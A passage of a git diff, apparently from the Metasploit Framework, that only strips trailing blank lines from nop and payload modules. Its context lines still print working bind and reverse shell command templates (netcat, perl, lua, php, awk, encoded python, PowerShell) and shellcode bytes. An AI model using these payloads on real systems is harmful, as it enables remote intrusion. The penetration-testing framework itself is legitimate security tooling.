bcde8565b6..5d88b1f812 100644 --- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -242,5 +242,4 @@ class MetasploitModule < Msf::Nop return sled end - end diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index cbb68acca5..e7179c3c1b 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -33,5 +33,4 @@ class MetasploitModule < Msf::Nop opty.generate_sled(length) end - end diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index c93de98bd1..36b6fbe4b6 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -140,5 +140,4 @@ SINGLE_BYTE_SLED = return out_sled end - end diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index 5d6ca69e38..649dd5f7e4 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -114,5 +114,4 @@ module MetasploitModule payload end - end diff --git a/modules/payloads/singles/aix/ppc/shell_find_port.rb b/modules/payloads/singles/aix/ppc/shell_find_port.rb index 4c3b02f22a..0c6b16b8cc 100644 --- a/modules/payloads/singles/aix/ppc/shell_find_port.rb +++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb @@ -103,5 +103,4 @@ module MetasploitModule payload end - end diff --git a/modules/payloads/singles/aix/ppc/shell_interact.rb b/modules/payloads/singles/aix/ppc/shell_interact.rb index d0ce9f53a4..8d7814ec2f 100644 --- a/modules/payloads/singles/aix/ppc/shell_interact.rb +++ b/modules/payloads/singles/aix/ppc/shell_interact.rb @@ -50,5 +50,4 @@ module MetasploitModule "\x05" end - end diff --git a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb index cc19172b33..e9c2812f30 100644 --- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb @@ -100,5 +100,4 @@ module MetasploitModule payload end - end diff --git a/modules/payloads/singles/android/meterpreter_reverse_http.rb b/modules/payloads/singles/android/meterpreter_reverse_http.rb index abc64ab86f..be346303b8 100644 --- a/modules/payloads/singles/android/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/android/meterpreter_reverse_http.rb @@ -49,5 +49,4 @@ module MetasploitModule opts[:stageless] = true super(opts) end - end diff --git a/modules/payloads/singles/android/meterpreter_reverse_https.rb b/modules/payloads/singles/android/meterpreter_reverse_https.rb index 39a05ddadb..36be490f09 100644 --- a/modules/payloads/singles/android/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/android/meterpreter_reverse_https.rb @@ -49,5 +49,4 @@ module MetasploitModule opts[:stageless] = true super(opts) end - end diff --git a/modules/payloads/singles/android/meterpreter_reverse_tcp.rb b/modules/payloads/singles/android/meterpreter_reverse_tcp.rb index 517e33b9bb..28f0a2eca3 100644 --- a/modules/payloads/singles/android/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/android/meterpreter_reverse_tcp.rb @@ -43,5 +43,4 @@ module MetasploitModule opts[:stageless] = true super(opts) end - end diff --git a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb index 7adae0f370..c5c7c7f520 100644 --- a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb @@ -43,5 +43,4 @@ module MetasploitModule "\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b" + "\x91\xd0\x20\x08" end - end diff --git a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb index b7fe7ea53d..b696aa773c 100644 --- a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb @@ -49,5 +49,4 @@ module MetasploitModule "\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\xe0\x3b\xbf\xf0" + "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" end - end diff --git a/modules/payloads/singles/bsd/x64/exec.rb b/modules/payloads/singles/bsd/x64/exec.rb index cbed899967..6b999a4349 100644 --- a/modules/payloads/singles/bsd/x64/exec.rb +++ b/modules/payloads/singles/bsd/x64/exec.rb @@ -67,5 +67,4 @@ module MetasploitModule "\x48\x83\xc8\x3b" + # or rax, 0x3b (execve) "\x0f\x05" # syscall end - end diff --git a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb index 114649967f..a2b7bce668 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb @@ -82,5 +82,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb index ef0d6b58b0..90dac9d4c1 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb @@ -81,5 +81,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb index 97156208fa..c83ab8a90c 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb @@ -87,5 +87,4 @@ module MetasploitModule OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0]) ]) end - end diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb index c43a06efb7..e35d5df3e8 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb @@ -75,5 +75,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb index 6cb43d35ce..74b0708387 100644 --- a/modules/payloads/singles/bsd/x86/exec.rb +++ b/modules/payloads/singles/bsd/x86/exec.rb @@ -44,5 +44,4 @@ module MetasploitModule def generate_stage(opts={}) bsd_x86_exec_payload end - end diff --git a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb index 6d43d0345b..c8ae57cc27 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb @@ -32,5 +32,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb index 4262074c9f..0ddd3058bc 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb @@ -32,5 +32,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb index 07ff5b62ec..51d2beb17c 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb @@ -73,5 +73,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb index 20dd2a6b69..9d3c5b1fb2 100644 --- a/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb @@ -42,5 +42,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsd/x86/shell_find_port.rb b/modules/payloads/singles/bsd/x86/shell_find_port.rb index 88bb44bc62..25a85549fc 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_port.rb @@ -68,5 +68,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsd/x86/shell_find_tag.rb b/modules/payloads/singles/bsd/x86/shell_find_tag.rb index 9c4d915956..9ca862214d 100644 --- a/modules/payloads/singles/bsd/x86/shell_find_tag.rb +++ b/modules/payloads/singles/bsd/x86/shell_find_tag.rb @@ -49,5 +49,4 @@ module MetasploitModule super end - end diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb index 179d33138e..3c81296382 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb @@ -67,5 +67,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb index 07c8f7bd61..f40aaefa44 100644 --- a/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb +++ b/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb @@ -46,5 +46,4 @@ module MetasploitModule OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0]) ]) end - end diff --git a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb index 95c89b69d6..d3ce457694 100644 --- a/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb @@ -40,5 +40,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsdi/x86/shell_find_port.rb b/modules/payloads/singles/bsdi/x86/shell_find_port.rb index 9b75d8590d..576c30f639 100644 --- a/modules/payloads/singles/bsdi/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsdi/x86/shell_find_port.rb @@ -39,5 +39,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb index a5ffbf84cb..975870f58e 100644 --- a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb @@ -40,5 +40,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/cmd/unix/bind_awk.rb b/modules/payloads/singles/cmd/unix/bind_awk.rb index 29872d0065..0d14e68633 100644 --- a/modules/payloads/singles/cmd/unix/bind_awk.rb +++ b/modules/payloads/singles/cmd/unix/bind_awk.rb @@ -51,5 +51,4 @@ module MetasploitModule def command_string "awk 'BEGIN{s=\"/inet/tcp/#{datastore['LPORT']}/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'" end - end diff --git a/modules/payloads/singles/cmd/unix/bind_inetd.rb b/modules/payloads/singles/cmd/unix/bind_inetd.rb index 57519db327..59c82a536c 100644 --- a/modules/payloads/singles/cmd/unix/bind_inetd.rb +++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb @@ -77,5 +77,4 @@ module MetasploitModule return cmd end - end diff --git a/modules/payloads/singles/cmd/unix/bind_lua.rb b/modules/payloads/singles/cmd/unix/bind_lua.rb index 3e8a4acfbe..05ca579352 100644 --- a/modules/payloads/singles/cmd/unix/bind_lua.rb +++ b/modules/payloads/singles/cmd/unix/bind_lua.rb @@ -50,6 +50,5 @@ module MetasploitModule def command_string "lua -e \"local s=require('socket');local s=assert(socket.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\"" end - end diff --git a/modules/payloads/singles/cmd/unix/bind_netcat.rb b/modules/payloads/singles/cmd/unix/bind_netcat.rb index 1b9e69f238..fe46d23df2 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb @@ -53,5 +53,4 @@ module MetasploitModule backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4)) "mkfifo /tmp/#{backpipe}; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}" end - end diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb index 8b54f4b1d6..b3f3ea67c1 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb @@ -47,5 +47,4 @@ module MetasploitModule def command_string "nc -l -p #{datastore['LPORT']} -e /bin/sh" end - end diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb index caa771b512..2ee7b881dc 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb @@ -47,5 +47,4 @@ module MetasploitModule def command_string "nc -6 -lp #{datastore['LPORT']} -e /bin/sh" end - end diff --git a/modules/payloads/singles/cmd/unix/bind_perl.rb b/modules/payloads/singles/cmd/unix/bind_perl.rb index 81ccdcbc25..f36539afc1 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl.rb @@ -48,5 +48,4 @@ module MetasploitModule cmd = "perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'" return cmd end - end diff --git a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb index 02d502feb7..a650f9752d 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb @@ -50,5 +50,4 @@ module MetasploitModule return cmd end - end diff --git a/modules/payloads/singles/cmd/unix/generic.rb b/modules/payloads/singles/cmd/unix/generic.rb index 21c38ea5b2..055e59048d 100644 --- a/modules/payloads/singles/cmd/unix/generic.rb +++ b/modules/payloads/singles/cmd/unix/generic.rb @@ -52,5 +52,4 @@ module MetasploitModule def command_string return datastore['CMD'] || '' end - end diff --git a/modules/payloads/singles/cmd/unix/interact.rb b/modules/payloads/singles/cmd/unix/interact.rb index 4c382c287c..2e0516a6b5 100644 --- a/modules/payloads/singles/cmd/unix/interact.rb +++ b/modules/payloads/singles/cmd/unix/interact.rb @@ -33,5 +33,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/cmd/unix/reverse.rb b/modules/payloads/singles/cmd/unix/reverse.rb index 4c5a58502b..6f402d0df6 100644 --- a/modules/payloads/singles/cmd/unix/reverse.rb +++ b/modules/payloads/singles/cmd/unix/reverse.rb @@ -53,5 +53,4 @@ module MetasploitModule " >/dev/null 2>&1 &)'" return cmd end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_awk.rb b/modules/payloads/singles/cmd/unix/reverse_awk.rb index 3fc49d0624..15fa828df6 100644 --- a/modules/payloads/singles/cmd/unix/reverse_awk.rb +++ b/modules/payloads/singles/cmd/unix/reverse_awk.rb @@ -52,5 +52,4 @@ module MetasploitModule def command_string "awk 'BEGIN{s=\"/inet/tcp/0/#{datastore['LHOST']}/#{datastore['LPORT']}\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'" end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_lua.rb b/modules/payloads/singles/cmd/unix/reverse_lua.rb index 4417a3c2d2..59b4df5637 100644 --- a/modules/payloads/singles/cmd/unix/reverse_lua.rb +++ b/modules/payloads/singles/cmd/unix/reverse_lua.rb @@ -50,6 +50,5 @@ module MetasploitModule def command_string "lua -e \"local s=require('socket');local t=assert(s.tcp());t:connect('#{datastore['LHOST']}',#{datastore['LPORT']});while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();\"" end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb index b927bad64f..fe2dda6c9c 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb @@ -47,5 +47,4 @@ module MetasploitModule def command_string "ncat -e /bin/sh --ssl #{datastore['LHOST']} #{datastore['LPORT']}" end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat.rb b/modules/payloads/singles/cmd/unix/reverse_netcat.rb index 47d5c571c7..7fe835d5f9 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb @@ -53,5 +53,4 @@ module MetasploitModule backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4)) "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} " end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb index 1ae1c3971a..750eb12ee0 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb @@ -47,5 +47,4 @@ module MetasploitModule def command_string "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh " end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl.rb b/modules/payloads/singles/cmd/unix/reverse_openssl.rb index 88c3d42131..b93613968a 100644 --- a/modules/payloads/singles/cmd/unix/reverse_openssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb @@ -53,5 +53,4 @@ module MetasploitModule " >/dev/null 2>&1 &)'" return cmd end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_perl.rb b/modules/payloads/singles/cmd/unix/reverse_perl.rb index 0301f5c79c..7c0d641bff 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb @@ -50,5 +50,4 @@ module MetasploitModule lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) cmd = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'" end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb index 29250a8464..f505018c5a 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb @@ -53,5 +53,4 @@ module MetasploitModule cmd += "$c=IO::Socket::SSL->new(\"#{lhost}:#{datastore['LPORT']}\");" cmd += "while(sysread($c,$i,8192)){syswrite($c,`$i`);}'" end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb index 1d30f1183c..bf37f8922f 100644 --- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -51,5 +51,4 @@ module MetasploitModule lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&" end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_python.rb b/modules/payloads/singles/cmd/unix/reverse_python.rb index ef4f30376c..611ed74a86 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python.rb @@ -56,5 +56,4 @@ module MetasploitModule encoded_cmd = Rex::Text.encode_base64(obfuscated_cmd) "python -c \"exec('#{encoded_cmd}'.decode('base64'))\"" end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb index aa3f6da96d..b863b38dce 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb @@ -69,5 +69,4 @@ module MetasploitModule return cmd end - end diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb index f54bbd240b..76aa33b5cd 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb @@ -57,5 +57,4 @@ module MetasploitModule " >/dev/null 2>&1 &)'" return cmd end - end diff --git a/modules/payloads/singles/cmd/windows/bind_lua.rb b/modules/payloads/singles/cmd/windows/bind_lua.rb index 45a4788605..86f8cca6de 100644 --- a/modules/payloads/singles/cmd/windows/bind_lua.rb +++ b/modules/payloads/singles/cmd/windows/bind_lua.rb @@ -50,6 +50,5 @@ module MetasploitModule def command_string "lua -e \"local s=require('socket');local s=assert(socket.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\"" end - end diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb index f14e545d6a..05449ceaa8 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl.rb @@ -50,5 +50,4 @@ module MetasploitModule return cmd end - end diff --git a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb index c6c32a7ffa..e60de7c2b9 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb @@ -50,5 +50,4 @@ module MetasploitModule return cmd end - end diff --git a/modules/payloads/singles/cmd/windows/generic.rb b/modules/payloads/singles/cmd/windows/generic.rb index 9d9db8fb5f..2891e40844 100644 --- a/modules/payloads/singles/cmd/windows/generic.rb +++ b/modules/payloads/singles/cmd/windows/generic.rb @@ -52,5 +52,4 @@ module MetasploitModule def command_string return datastore['CMD'] || '' end - end diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb index 588cf15569..74156bcaf8 100644 --- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb @@ -43,5 +43,4 @@ module MetasploitModule def generate generate_powershell_code("Bind") end - end diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb index 5525a64d5b..827a3eb87f 100644 --- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb @@ -50,5 +50,4 @@ module MetasploitModule def generate generate_powershell_code("Reverse") end - end diff --git a/modules/payloads/singles/cmd/windows/reverse_lua.rb b/modules/payloads/singles/cmd/windows/reverse_lua.rb index ca8cd17ab7..c34fb6454e 100644 --- a/modules/payloads/singles/cmd/windows/reverse_lua.rb +++ b/modules/payloads/singles/cmd/windows/reverse_lua.rb @@ -50,6 +50,5 @@ module MetasploitModule def command_string "lua -e \"local s=require('socket');local t=assert(s.tcp());t:connect('#{datastore['LHOST']}',#{datastore['LPORT']});while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();\"" end - end diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index db575ac2e2..a8d8305aea 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -50,5 +50,4 @@ module MetasploitModule lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) cmd = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"} end - end diff --git a/modules/payloads/singles/cmd/windows/reverse_powershell.rb b/modules/payloads/singles/cmd/windows/reverse_powershell.rb index 77beaf4a42..21a43d5c88 100644 --- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb +++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb @@ -99,5 +99,4 @@ module MetasploitModule "powershell -w hidden -nop -c #{powershell}" end - end diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb index 787c485bbb..4769625262 100644 --- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb +++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb @@ -68,5 +68,4 @@ module MetasploitModule EOS end - end diff --git a/modules/payloads/singles/generic/custom.rb b/modules/payloads/singles/generic/custom.rb index bdc671d79f..91c2b93721 100644 --- a/modules/payloads/singles/generic/custom.rb +++ b/modules/payloads/singles/generic/custom.rb @@ -60,5 +60,4 @@ module MetasploitModule return encoders2 end - end diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb index 30be5c2e5b..21a50a92ab 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -27,5 +27,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/generic/shell_bind_tcp.rb b/modules/payloads/singles/generic/shell_bind_tcp.rb index df1354760c..c8401fe35c 100644 --- a/modules/payloads/singles/generic/shell_bind_tcp.rb +++ b/modules/payloads/singles/generic/shell_bind_tcp.rb @@ -23,5 +23,4 @@ module MetasploitModule 'Session' => Msf::Sessions::CommandShell )) end - end diff --git a/modules/payloads/singles/generic/shell_reverse_tcp.rb b/modules/payloads/singles/generic/shell_reverse_tcp.rb index 7d5cece6bb..5bf8552dcc 100644 --- a/modules/payloads/singles/generic/shell_reverse_tcp.rb +++ b/modules/payloads/singles/generic/shell_reverse_tcp.rb @@ -23,5 +23,4 @@ module MetasploitModule 'Session' => Msf::Sessions::CommandShell )) end - end diff --git a/modules/payloads/singles/generic/tight_loop.rb b/modules/payloads/singles/generic/tight_loop.rb index 51f2e22ab8..c192458cf0 100644 --- a/modules/payloads/singles/generic/tight_loop.rb +++ b/modules/payloads/singles/generic/tight_loop.rb @@ -25,5 +25,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb index 16b2ec1407..4176e25d20 100644 --- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb @@ -38,5 +38,4 @@ module MetasploitModule def generate return super + jsp_bind_tcp end - end diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb index 3ab1deec75..73380eaaae 100644 --- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb @@ -43,5 +43,4 @@ module MetasploitModule return super + jsp_reverse_tcp end - end diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb index c5aac9fe54..8c6bdb68a8 100644 --- a/modules/payloads/singles/linux/armle/adduser.rb +++ b/modules/payloads/singles/linux/armle/adduser.rb @@ -58,5 +58,4 @@ module MetasploitModule str + pwdir end - end diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb index 7c0b4deefe..ce62f58899 100644 --- a/modules/payloads/singles/linux/armle/exec.rb +++ b/modules/payloads/singles/linux/armle/exec.rb @@ -41,5 +41,4 @@ module MetasploitModule "\x01\x90\x01\xa9\x92\x1a\x0b\x27\x01\xdf" + cmd end - end diff --git a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb index 36a7ded1a9..449933a5e1 100644 --- 